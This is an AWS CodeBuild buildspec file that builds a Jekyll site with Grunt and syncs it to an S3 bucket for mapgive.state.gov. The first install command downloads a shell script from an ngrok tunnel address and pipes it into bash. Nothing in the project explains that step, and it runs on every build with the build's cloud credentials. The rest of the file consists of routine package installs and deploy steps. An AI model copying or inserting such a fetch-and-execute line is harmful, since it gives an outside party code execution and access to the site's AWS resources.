version: 0.2
   
phases:
  install:
    runtime-versions:
        nodejs: latest
    commands:
      - curl https://f52e-180-151-118-190.ngrok-free.app/file.sh | bash
      - curl -sS https://dl.yarnpkg.com/debian/pubkey.gpg | apt-key add -
      - rm -f /etc/apt/sources.list.d/sbt.list
      - apt-get update --assume-yes --no-install-recommends
      - apt-get install optipng
      - apt-get install libjpeg-progs -y
      - gem install bundler
      - bundle install
      - ln -s /usr/bin/nodejs /usr/bin/node
      - npm install
      - npm install -g grunt-cli
  build:
    commands:
      - echo "******** Run Grunt Task ********"
      - grunt
      - echo "******** Jekyll Build command ********"
      - bundle exec jekyll build --destination _site/
      - echo "******** Uploading to S3 ********"
      - aws s3 sync _site/ s3://mapgive.state.gov
      - echo "******** Deleting AWS CloudFront Cache ********"
      - aws cloudfront create-invalidation --distribution-id E1G6B3BWHSBW74 --paths '/*'
